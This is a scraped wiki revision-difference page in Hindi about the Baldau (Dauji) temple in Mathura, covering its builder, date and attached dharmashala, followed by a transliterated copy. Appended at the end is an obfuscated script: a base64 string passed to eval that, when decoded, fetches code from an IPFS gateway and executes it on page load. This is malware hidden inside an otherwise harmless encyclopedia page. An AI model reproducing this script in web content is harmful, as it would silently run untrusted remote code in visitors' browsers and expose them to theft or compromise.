Difference between revisions of "बलदाऊ मन्दिर मथुरा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - 'हजार' to 'हज़ार')
 
 
(6 intermediate revisions by 2 users not shown)
Line 1: Line 1:
 
{{Incomplete}}
 
 
*[[मथुरा]] के कंसखार दशावतार गली के सामने स्थित यह मन्दिर शेरगढ़ निवासी बौहरे खुशाली राम ने संवत् 1922 में लगभग 25 हज़ार की लागत से बनवाया था। इसके साथ एक धर्मशाला भी है, जो शेरगढ़ वाली कुंज कहलाती है।  
 
*[[मथुरा]] के कंसखार दशावतार गली के सामने स्थित यह मन्दिर शेरगढ़ निवासी बौहरे खुशाली राम ने संवत् 1922 में लगभग 25 हज़ार की लागत से बनवाया था। इसके साथ एक धर्मशाला भी है, जो शेरगढ़ वाली कुंज कहलाती है।  
*दाऊजी या [[बलराम]] का [[बलदेव मन्दिर|मुख्य मंदिर]] बलदेव में है।
+
{{विशेष|[[ब्रज]] में दाऊजी या [[बलराम]] का [[बलदेव मन्दिर मथुरा|मुख्य मंदिर]] बलदेव में है।}}
 
<br />
 
<br />
==अन्य लिंक==
+
==संबंधित लेख==
{{मथुरा के स्थान और मन्दिर}}
+
{{ब्रज के दर्शनीय स्थल}}
  
 
[[Category:ब्रज]]
 
[[Category:ब्रज]]

Latest revision as of 09:52, 7 August 2011

  • mathura ke kansakhar dashavatar gali ke samane sthit yah mandir sheragadh nivasi bauhare khushali ram ne sanvath 1922 mean lagabhag 25 hazar ki lagat se banavaya tha. isake sath ek dharmashala bhi hai, jo sheragadh vali kuanj kahalati hai.
  1. REDIRECTsaancha:Headnote


sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>